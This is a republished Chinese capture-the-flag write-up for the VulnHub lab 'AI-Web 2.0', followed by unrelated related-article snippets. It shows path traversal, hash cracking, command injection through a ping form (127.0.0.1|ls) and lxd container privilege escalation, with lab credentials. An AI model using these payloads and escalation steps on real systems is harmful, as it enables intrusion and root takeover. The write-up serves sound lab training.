vulnhub靶場ai-web 2.0

1 信息收集

1.1 主機發現

arp-scan -l

主機地址為192.168.1.4

1.2 服務端口掃描

nmap -sS -sV -A -T5 -p- 192.168.1.4

開放22,80端口

2 訪問服務

2.1 80端口訪問

http://192.168.1.4:80/

先嘗試admin等其他常見用戶名登錄無果

然后點擊signup發現這是一個注冊接口

注冊好username就可以直接進行登錄,這里注冊一個root

根據頁面提示內容進行搜索

發現此為目錄遍歷漏洞

采用/download.php?file_name=…/etc/passwd的形式讀取

一點一點的嘗試

../../../../../../etc/passwd

根據之前信息收集的結果來看,服務器采用apache

所以嘗試讀取/etc/apache2/.htpasswd文件

得到對應的hash密碼

嘗試使用工具破解

這里采用john工具進行破解,kali自帶

使用john進行爆破一下,,,,發現爆破不了,,, 后面看了描述提示了字典:

This is the second box from the series AI: Web and you will have more fun to crack this challenge.
The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root.
You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Daniel Miessler.
For any hint please tweet on @arif_xpress

使用字典:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt

john --wordlist=rockyou-45.txt temp.txt 

得到賬號密碼:aiweb2admin:c.ronaldo

嘗試之前發現的ssh端口,發現不是ssh賬號密碼

3 目錄掃描

3.1 dirb掃描

發現了webadmin頁面需要密碼賬號登錄

嘗試用剛剛收集到的賬號密碼

賬號aiweb2admin 密碼c.ronaldo

發現可以登錄

根據提示內容,得知還有robots頁面

根據文件內容提示獲取以下兩個路徑

http://192.168.1.4/webadmin/H05Tpin9555/

http://192.168.1.4/webadmin/S0mextras/

第一個頁面中為ping測試的內容,可以通過命令執行漏洞方式來獲取其他內容

而第二個頁面中提示尋找一些有趣的東西在本文件夾中

首先在ping頁面中輸入127.0.0.1查看結果

顯示為ping IP的反饋

使用管道符分割后再提交可以看到發生了變化

127.0.0.1|ls

發下其讀出了文件夾下目錄

已知此頁面與需要查看文件頁面為同級 如果返回上級頁面再進入S0mextras下有可能會獲取到對應的文件內容

使用

127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null

獲得以下結果

可以看到隱藏文件 .sshUserCred55512.txt

http://192.168.1.4/webadmin/S0mextras/.sshUserCred55512.txt

賬號:n0nr00tuser 密碼:zxowieoi4sdsadpEClDws1sf

使用其登錄ssh 登錄成功

至此成功登入對應服務器

4 提權

4.1 查看權限

id查看權限

發現用戶屬于lxd組

想到了lxd提權

使用

find / -perm -u=s -type f 2>/dev/null

從根目錄查找具有root權限的二進制文件

剛好發現了lxc也存在root權限

4.2 創建容器,掛載磁盤,進入容器,進入目錄提權

GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD

把容器上傳進去

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test //創建容器test

lxc init test test -c security.privileged=true //初始化

lxc config device add test test disk source=/ path=/mnt/root recursive=true //給 test 添加磁盤掛載到/mnt/root 本機的/根目錄等價于容器的/mnt/root 目錄

lxc start test //啟動容器

lxc exec test /bin/sh //此時就是 root 權限,因為這個容器是你創建的,所以你享有所有權,如果你訪問/root 是沒有文件的

cd /mnt/root/root //這其實就是訪問服務器的/root 目錄

cat flag.txt

由于這個用戶是在 lxd 組里面,所以他能創建容器,然后把 root 權限能操作的目錄,掛在到容器里

面,那么你再進入容器里面進行操作的話,就是 root 權限

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/38286.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/38286.shtml
英文地址,請注明出處:http://en.pswp.cn/web/38286.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

prescan軟件中導入路徑文件txt/lpx

由于博主收到的是lpx格式的路徑文件,因此,第一步 1.記事本打開 ctrla 全選 ctrlc 復制 2.新建一個excel 鼠標定位到第一行第一列的格子 ctrlv 復制 3.數據欄“分列”功能 4. (0.1遞增的數列,緯度,經度,高程) 導入…

python——面向對象小練習士兵突擊與信息管理系統

士兵突擊 需求 1. 士兵 許三多 有一把 AK47 2. 士兵 可以 開火 3. 槍 能夠 發射 子彈 4. 槍 裝填 裝填子彈 —— 增加子彈數量 # 士兵突擊 # 需求 # 1. 士兵 許三多 有一把 AK47 # 2. 士兵 可以 開火 # 3. 槍 能夠 發射 子彈 # 4. 槍 裝填 裝填子彈 —— 增加子彈數量 cl…

JDBC操作流程

目錄 簡介 具體操作 1. 引入驅動包 1)下載驅動包 2)引入驅動包到項目中 2. 編寫代碼 1)創建數據源 2)建立連接 3)構造 SQL 語句 4)執行 SQL 語句 5)釋放資源 總結 簡介 JDBC 就是使…

某網頁gpt的JS逆向

原網頁網址 (base64) 在線解碼 aHR0cHM6Ly9jbGF1ZGUzLmZyZWUyZ3B0Lnh5ei8 逆向效果圖 調用代碼(復制即用) 把倒數第三行換成下面的base64解碼 aHR0cHM6Ly9jbGF1ZGUzLmZyZWUyZ3B0Lnh5ei9hcGkvZ2VuZXJhdGU import hashlib import time import reques…

C語言+ MSSQL技術開發的 PACS系統源碼:CT后處理技術之仿真內鏡CTVE

C語言 MSSQL技術開發的 PACS系統源碼:CT后處理技術之仿真內鏡CTVE 仿真內窺鏡VE VE是利用醫學影像作為原始數據,融合圖像處理、計算機圖形學、科學計算可視化、虛擬現實技術,模擬傳統光學內鏡的一種技術。 又叫做腔內重建技術,是…

試用筆記之-匯通來電顯示軟件

首先匯通來電顯示軟件下載 http://www.htsoft.com.cn/download/httelephone.rar

平衡樹專題Splay

寫在前面: 部分來自孫寶(Steven24)的博客,表示感謝。 認識 什么是Splay 就是BST的一種,整體效率是很高的,均攤的次數是O(logn)級別的。 基本操作就是把節點旋轉到BST的root,從而改善BST的平…

為適配kubelet:v0.4 安裝指定版本的docker

系統版本信息 cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core) 0.4 版本的kubelet 報錯信息記錄 E0603 19:00:38.273720 44142 kubelet.go:734] Error syncing pod: API error (400): {"message": "starting container with non-empty reque…

免交互簡單操作

免交互 交互:我們發出指令控制程序的運行,程序在接收到指令后按照指令的效果作出對應的反應 免交互:間接的,通過第三方的方式把指令傳給程序,不用直接下達指令 Here Document免交互 這是命令行格式,也可…

不用找了!這個軟件自帶各行業話術,客服效率飛躍

有一款客服工具軟件,不但能吸附聊天窗口,實現圖文視頻話術的一鍵發送,還內置了多行業的優質客服話術模板,允許用戶直接下載使用,快速構建起適合自身企業的專業客服知識庫。 前言 在今天的快節奏商業環境中&#xff0c…

Linux shell腳本編程

一、sehll簡介: 用戶通過shell向計算機發送指令的 計算機通過shell給用戶返回指令的執行結果 1.1、通過shell編程可以達到的效果 提高工作的效率 可以實現自動化 1.2、sehll腳本編寫的流程 1、用vi/vim創建一個.sh的文件 2、在文件中進行開發 3、個文件賦予可執行權…

CesiumJS【Basic】- #047 繪制閃爍線(Entity方式)- 需要自定義著色器

文章目錄 繪制閃爍線(Entity方式)- 需要自定義著色器1 目標2 代碼2.1 main.ts繪制閃爍線(Entity方式)- 需要自定義著色器 1 目標 使用Entity方式繪制閃爍線 2 代碼 2.1 main.ts import * as Cesium from cesium;const viewer = new Cesium<

【如何使用RSA簽名驗簽】python語言

文章目錄 簽名方法異步同步通知數據驗簽生活號響應數據驗簽同步響應數據驗簽 &#x1f308;你好呀&#xff01;我是 山頂風景獨好 &#x1f388;歡迎踏入我的博客世界&#xff0c;能與您在此邂逅&#xff0c;真是緣分使然&#xff01;&#x1f60a; &#x1f338;愿您在此停留的…

作業7.2

用結構體數組以及函數完成: 錄入你要增加的幾個學生&#xff0c;之后輸出所有的學生信息 刪除你要刪除的第幾個學生&#xff0c;并打印所有的學生信息 修改你要修改的第幾個學生&#xff0c;并打印所有的學生信息 查找你要查找的第幾個學生&#xff0c;并打印該的學生信息 1 /*…

idea常用問題記錄

文章目錄 1.ant構建報錯編譯錯誤1.1 解決辦法 1.ant構建報錯編譯錯誤 Compile failed;xxx 1.1 解決辦法

Python系統教程02

鞏固 input()輸出函數 回顧 1 、 input()函數&#xff1a; 在 input()函數輸入時&#xff0c;輸入的內容一定為字符串類型。 2 、條件分支語句&#xff1a; 每一個 if 語句可以看成一個個體&#xff0c;elif 和 else 都是一個 if 個體的一部分&#xff0c;每一個 if 個體 運…

51單片機外部中斷(按鍵識別)

歡迎入群共同學習交流 時間記錄&#xff1a;2024/7/2 一、電路原理圖 51單片機包含INT0、INT1兩個外部中斷接口 二、知識點介紹 1.中斷寄存器位介紹 &#xff08;1&#xff09;TCON定時控制寄存器&#xff0c;位0&#xff08;IT0&#xff09;中斷INT0請求信號選擇位&#x…

WordPress主題開發進群付費主題v1.1.2 多種引流方式

全新前端UI界面&#xff0c;多種前端交互特效讓頁面不再單調&#xff0c;進群頁面群成員數&#xff0c;群成員頭像名稱&#xff0c;每次刷新頁面隨機更新不重復&#xff0c;最下面評論和點贊也是如此隨機刷新不重復 進群頁面簡介&#xff0c;群聊名稱&#xff0c;群內展示&…

注意!年齡越大,社交圈子越窄?其實這是老人的理性選擇!數學家告訴你:何時該跳槽,何時該堅守!你必須知道的三個智慧:讓你的人生更加精彩!

我們到底應該在什么情況下探索新事物&#xff0c;什么情況下專注于已有的東西呢&#xff1f;本質上來說&#xff0c;這個問題就是在詢問&#xff0c;你究竟應該耗費精力去探索新的信息&#xff0c;還是專注從既有的信息中獲取收獲&#xff1f; 有人采訪了臨終的老人&#xff0c…

中國三大平原矢量示意圖分享

我們在《中國地勢三級階梯示意圖分享》、《中國四大高原矢量示意圖分享》和《中國主要山脈矢量示意圖分享》等文中&#xff0c;為你分享過中國地勢相關的矢量示意圖。 現在再為你分享一下我國東北平原、華北平原和長江中下游平原的矢量示意圖&#xff0c;這三大平原均位于我國…